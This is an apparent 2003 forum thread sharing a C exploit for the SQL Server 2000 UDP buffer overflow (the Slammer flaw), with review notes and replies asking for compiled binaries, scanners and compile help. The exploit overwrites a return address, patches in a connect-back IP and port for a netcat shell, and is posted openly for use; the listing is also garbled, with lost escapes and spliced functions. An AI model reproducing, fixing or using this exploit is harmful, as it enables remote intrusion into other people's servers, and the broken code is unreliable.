// Command-line front end of the "SQL Server UDP Buffer Overflow Remote Exploit"
// (David Litchfield's code, modified by lion/HUC per the banner below).
//
// NOTE(review): this listing is a transcription of a fragment, not a buildable
// program, and is kept verbatim here:
//  - `host`, `request`, `explen`, `len` and GainControlOfSQL() are declared or
//    defined outside the visible lines, and the statements that build the start
//    of `request` are missing between the argument parsing and the strcat() calls;
//  - every backslash has been lost, so "rn" stands for "\r\n" and "xDC" for
//    "\xDC" -- as written, the strcat() calls append ASCII letters, not bytes;
//  - several lines that were comment + statement have collapsed onto one line,
//    so the statement now sits inside the // comment (see notes below).
//
// Arguments (from the banner): argv[1] = target, argv[2] = connect-back host,
// argv[3] = connect-back TCP port, argv[4] = target service-pack level. Only
// argv[1..3] are used in the visible lines. Returns 0 on every path.
int main(int argc, char *argv[]) { unsigned int ErrorLevel=0; int count = 0; char sc[300]=""; char ipaddress[40]=""; unsigned short port = 0; unsigned int ip = 0; char *ipt=""; char buffer[400]=""; unsigned short prt=0; char *prtt="";
// Usage banner. The inner quotes around Advanced Windows Shellcode are
// unescaped and the "\>" in the prompt strings is not a valid escape; both look
// like transcription damage. Note the check admits argc == 2 as well as 5.
if(argc != 2 && argc != 5) { printf("===============================================================rn"); printf("SQL Server UDP Buffer Overflow Remote Exploitrnn"); printf("Modified from "Advanced Windows Shellcode"rn"); printf("Code by David Litchfield, david@ngssoftware.comrn"); printf("Modified by lion, fix a bug.rn"); printf("Welcome to HUC Website http://www.cnhonker.comrnn"); printf("Usage:rn"); printf(" %s Target [<NCHost> <NCPort> <SQLSP>]rnn", argv[0]); printf("Exemple:rn"); printf(" C:\>nc -l -p 53rn"); printf("Target is MSSQL SP 0:rn"); printf(" C:\>%s 192.168.0.1 192.168.7.1 53 0rn",argv[0]); printf("Target is MSSQL SP 1 or 2:rn"); printf(" c:\>%s 192.168.0.1 192.168.7.1 53 1rnn", argv[0]); return 0; }
// NOTE(review): `host` is not declared in this function (presumably a file-scope
// buffer whose size is not visible). strncpy() with a fixed count of 100 does not
// NUL-terminate when argv[1] is 100 characters or longer, and nothing checks the
// destination's real size.
strncpy(host, argv[1], 100);
// NOTE(review): the usage check above accepts argc == 2, yet argv[2] and argv[3]
// are read unconditionally here and on the next line. With two arguments argv[2]
// is NULL, so strncpy() and atoi() dereference a null pointer (undefined
// behaviour). ipaddress[40] is zero-filled, so a 36-byte copy stays terminated.
strncpy(ipaddress, argv[2], 36);
// atoi() gives no error indication; a non-numeric or out-of-range value silently
// becomes 0 or is truncated on assignment to unsigned short.
port = atoi(argv[3]);
// NOTE(review): the service-pack-dependent last-byte fix-up described in this
// comment is not among the visible statements; `prt` and `prtt` declared above
// are likewise never used in the visible lines.
// SQL Server 2000 Service pack level // The import entry for GetProcAddress in sqlsort.dll // is at 0x42ae1010 but on SP 1 and 2 is at 0x42ae101C // Need to set the last byte accordingly
// NOTE(review): in this transcription the whole next line is one // comment, so
// the inet_addr() call and the four stores into buffer[142..145] (copying the
// bytes of `ip` into the payload at a fixed offset) are commented out. Even in
// the intended form, inet_addr()'s INADDR_NONE failure value is never checked,
// and the offsets must match a shellcode layout in `buffer` that is not visible.
// set this IP address to connect back to // this should be your address ip = inet_addr(ipaddress); ipt = (char*)&ip; buffer[142]=ipt[0]; buffer[143]=ipt[1]; buffer[144]=ipt[2]; buffer[145]=ipt[3];
// The port patching this comment refers to does not appear in the visible lines.
// set the TCP port to connect on // netcat should be listening on this port // e.g. nc -l -p 80
// Overwrite the saved return address on the stack // This address contains a jmp esp instruction // and is in sqlsort.dll.
// NOTE(review): as transcribed, "xDCxC9xB0x42" is a 12-character ASCII string,
// not the four bytes 0xDC 0xC9 0xB0 0x42 named in the trailing comment; the
// original almost certainly used "\x" escapes. `request` is declared elsewhere
// and strcat() has no bound against its size.
strcat(request,"xDCxC9xB0x42"); // 0x42B0C9DC
// NOTE(review): the strcat() on this line has been absorbed into the comment by
// the line collapse (same for the two address lines and the NOP line below).
// Need to do a near jump strcat(request,"xEBx0Ex41x42x43x44x45x46");
// Need to set an address which is writable or // sql server will crash before we can exploit // the overrun. Rather than choosing an address // on the stack which could be anywhere we'll // use an address in the .data segment of sqlsort.dll // as we're already using sqlsort for the saved // return address
// NOTE(review): the "no service pack" and "Service Pack 2" lines carry the same
// bytes (0x42AE7001); whether that is intended (same .data address on both
// builds) or a transcription artefact cannot be told from this page.
// SQL 2000 no service packs needs the address here strcat(request,"x01x70xAEx42");
// SQL 2000 Service Pack 2 needs the address here strcat(request,"x01x70xAEx42");
// just a few nops strcat(request,"x90x90x90x90x90x90x90x90");
// `len`, `explen` and `request` are all defined outside the visible lines.
len = strlen(request)+ explen;
// NOTE(review): the memcpy() on this line has also been swallowed by the comment.
// In the intended form it appends explen bytes of `buffer` after the current
// contents of `request` with no check that `request` is large enough.
// tack on exploit code to the end of our request and fire it off memcpy(request+strlen(request), buffer, explen);
// Debug output left disabled by the author (strlen() returns size_t, so "%d"
// would also be a format mismatch if re-enabled).
// printf("Size: %d/%drn", len, strlen(request));
// Defined outside the visible lines; presumably opens the UDP socket and sends
// `request` -- cannot be confirmed from here.
GainControlOfSQL();
return 0; }
// NOTE(review): the next three lines are a splice, not one function. The first
// is the opening of StartWinsock() (Winsock start-up locals; its body is not in
// the visible text). The second belongs to a different routine -- the tail of
// the send/receive code that prints the server's response -- and its brace count
// does not match this function. `rcv`, `s`, `resp` and `count` are not declared
// here. Kept verbatim.
int StartWinsock() { int err=0; WORD wVersionRequested; WSADATA wsaData;
// Response handling (from the other routine): after recv(), NUL bytes within the
// `rcv` received bytes are replaced with spaces so printf("%s") prints the whole
// response. That printf then relies on a terminator after byte rcv-1 in `resp`,
// whose declaration (and whether 596 fits it) is not visible. `if(rcv > 1)` also
// covers SOCKET_ERROR (-1) and an empty datagram, so a recv() failure is silently
// ignored rather than reported.
printf("Packet sent!rn"); printf("If you don't have a shell it didn't work.rn"); rcv = recv(s,resp,596,0); if(rcv > 1) { while(count < rcv) { if(resp[count]==0x00) resp[count]=0x20; count++; } printf("%s",resp); } } closesocket(s);
return 0; }
* I know it's a bit long for this page, but it's a good exploit and I thought I should share it. *
groove-monkey
Aug 19 2003, 07:31 PM
Can someone compile this and post the binary? It would be greatly appreciated.
I'm about to search for scanners and any tutorials that might be available for this exploit. If anyone already has one, it would be great if you let us know. I'll post my findings once I find ones worth posting.
FL4Me
Aug 19 2003, 07:45 PM
OK - I will compile and upload it. (I will edit this message after I compile and upload it, and add a link.)
larsbruggie
Aug 19 2003, 09:49 PM
that would be great
jurk-off
Aug 19 2003, 10:05 PM
Wow, very good job, mate! I'll go research scanners.
I believe this bug is old — it's from July 2002 if I'm not mistaken. Still, I compiled it and put it in the download section. Good luck with it; let me know if it works.
Greetings, woutiir
shaun2k2
Aug 20 2003, 03:30 PM
Next time, when posting exploit code, will you please at least post a link to the advisory instead of simply posting the exploit? That way people absorb the technical details of the vulnerability instead of just trying to break into other people's computers.
Jurk-off did the right thing by providing vulnerability information. Cheers.
Thank you for your time. Shaun.
will_do
Aug 20 2003, 03:37 PM
Can anybody tell me how to scan for this, and with which scan tool?
greatly appreciated
SoleKiller
Aug 20 2003, 07:56 PM
Thank you very much.
bratt
Aug 20 2003, 08:24 PM
Old — released Jan 29, 2003. Need a scanner.
TheCommiser
Aug 20 2003, 09:45 PM
Is this the exploit Slammer used?
SyN/AcK
Jan 18 2004, 10:43 AM
Thanks for this, guys... and yes, this is the vulnerability that SQL Slammer used.
INVASION
Jan 18 2004, 02:16 PM
Does somebody have a tutorial on how to compile this?
SyN/AcK
Jan 18 2004, 06:51 PM
Simple, just load up Visual Studio and compile it. (Note that the listing as posted has lost the backslashes from its escape sequences — "rn" for "\r\n", "xDC" for "\xDC" — and is only a fragment, so it will not compile as shown.)
I believe this targets UDP port 1434. It's the same vulnerability that SQL Slammer exploited.
cyrixx
Jan 18 2004, 07:04 PM
Yo — and it's now useless; I don't think anybody will find any targets.